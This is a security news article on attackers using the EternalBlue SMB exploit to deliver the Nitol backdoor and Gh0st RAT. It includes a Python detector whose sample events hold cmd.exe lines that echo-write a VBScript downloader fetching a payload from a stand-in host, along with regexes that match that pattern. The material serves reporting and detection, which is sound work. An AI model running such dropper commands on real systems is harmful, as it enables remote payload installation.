The EternalBlue Exploit Deployed to Deliver Backdoor.Nitol, Gh0st RAT

The now-infamous EternalBlue exploit deployed in the WannaCry ransomware outbreak and in the distribution of the Adylkuzz miner is now being used to deliver the Nitol backdoor and Gh0st RAT. Both threats have been around for several years and are once again included in malicious operations.

The SMB Flaw from WannaCry and Adylkuzz Campaigns Deployed Once Again

FireEye researchers say that the criminals behind this campaign are once again using the very same SMB flaw (MS17-010) that was leveraged for the distribution of WannaCry.

“We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” FireEye researchers recently shared.

More about Gh0st RAT

As already mentioned, the RAT has been deployed in various malicious operations for many years. Interestingly, its primary use is as a nation-state tool for APT attacks against government agencies and politically-engaged targets. Gh0st RAT was also one of the backdoors searched for by Malware Hunter, the “specialized Shodan crawler that explores the Internet looking for command & control (C2s) servers for botnets”.

Related Story: Malware Hunter Locates the Command and Control Centers of Botnets

More about Backdoor.Nitol

Nitol, or Backdoor.Nitol, has been part of operations built upon a remote code execution flaw using the ADODB.Stream ActiveX Object affecting older versions of Internet Explorer, FireEye researchers say. Interestingly, both Nitol and Gh0st have been distributed via the CVE-2014-6332 vulnerability and in spam campaigns targeting PowerShell commands.

The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload from another server.
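The "shell writes a VBScript file, then executes it to fetch the payload" sequence described above leaves a recognisable trace in process-creation telemetry: a cmd.exe command line that echo-redirects into a .vbs file, followed shortly afterwards on the same host by cscript.exe or wscript.exe running that same file. The Python below is an added example of that correlation, not code from this article or from FireEye; the Sysmon-style event fields, host names, file paths and download URL are all constructed placeholders.

```python
"""Correlate process-creation events for the 'shell writes a .vbs, then runs it'
pattern. Added example; the event schema (host, ts, image, cmdline) is an
assumption modelled on Sysmon Event ID 1, not a real product format."""
import re
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Hosts, paths and the URL
# are invented for this example.
SAMPLE_EVENTS = [
    {"host": "lab-01", "ts": "2017-06-05T10:00:01",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'cmd.exe /c echo Set o=CreateObject("MSXML2.XMLHTTP") > C:\\Windows\\Temp\\dl.vbs'},
    {"host": "lab-01", "ts": "2017-06-05T10:00:02",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'cmd.exe /c echo o.Open "GET","http://payload.example/stage2.exe",0 >> C:\\Windows\\Temp\\dl.vbs'},
    {"host": "lab-01", "ts": "2017-06-05T10:00:05",
     "image": "C:\\Windows\\System32\\cscript.exe",
     "cmdline": "cscript.exe //nologo C:\\Windows\\Temp\\dl.vbs"},
    # Benign admin activity on another host: a script runs, but nothing on
    # that host wrote it via a shell redirect, so no alert is raised.
    {"host": "lab-02", "ts": "2017-06-05T10:05:00",
     "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "wscript.exe C:\\Scripts\\inventory.vbs"},
]

# cmd.exe 'echo ... > file.vbs' or '>> file.vbs' redirection
WRITE_RE = re.compile(r'echo\b.*?>{1,2}\s*"?([^\s"]+\.vbs)"?', re.IGNORECASE)
# cscript/wscript invoking a .vbs file
EXEC_RE = re.compile(r'\b[cw]script(?:\.exe)?\b.*?"?([^\s"]+\.vbs)"?', re.IGNORECASE)
# any URL embedded in the echoed script text (candidate payload server)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _parse_ts(s):
    return datetime.fromisoformat(s)


def find_vbs_dropper_chains(events, window=timedelta(minutes=5)):
    """Return one alert per (host, script) where a cmd.exe shell echo-wrote a
    .vbs file and cscript/wscript executed the same file within `window`."""
    writes = {}   # (host, script path lower-cased) -> {"first": ts, "urls": [...]}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        image = ev["image"].lower()
        if image.endswith("\\cmd.exe"):
            m = WRITE_RE.search(ev["cmdline"])
            if not m:
                continue
            key = (ev["host"], m.group(1).lower())
            rec = writes.setdefault(key, {"first": _parse_ts(ev["ts"]), "urls": []})
            rec["urls"].extend(URL_RE.findall(ev["cmdline"]))
        elif image.endswith(("\\cscript.exe", "\\wscript.exe")):
            m = EXEC_RE.search(ev["cmdline"])
            if not m:
                continue
            key = (ev["host"], m.group(1).lower())
            rec = writes.get(key)
            if rec is None:
                continue
            if _parse_ts(ev["ts"]) - rec["first"] <= window:
                alerts.append({
                    "host": ev["host"],
                    "script": m.group(1),
                    "written": rec["first"].isoformat(),
                    "executed": ev["ts"],
                    "payload_urls": list(rec["urls"]),
                })
    return alerts


if __name__ == "__main__":
    for a in find_vbs_dropper_chains(SAMPLE_EVENTS):
        print(a)
```

Run against the constructed events this yields a single alert for lab-01 naming the script path and the URL seen in the echoed lines; the second host produces nothing because its script was never written by a shell redirect. Requiring the write and the execution to come from the same host inside a short window is what keeps this rule quiet on hosts where administrators legitimately run VBScript.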

Gh0st RAT Sample Signed with Stolen Certificate

According to researchers, the combination of EternalBlue and VBScript has been spreading Nitol in Singapore and Nitol in South Asia. Also, the samples acquired by FireEye were signed with a common digital certificate which is most likely stolen:

The Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye are all signed with a common digital certificate purporting to be from 北京研创达科技有限公司 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.

Related Story: EternalRocks Worm More Powerful Than WannaCry SMB Worm

In conclusion, the addition of EternalBlue to Metasploit has made it very easy for attackers to exploit these flaws. Researchers expect more threat groups to start leveraging the same vulnerabilities to deliver different payloads.

Milena Dimitrova
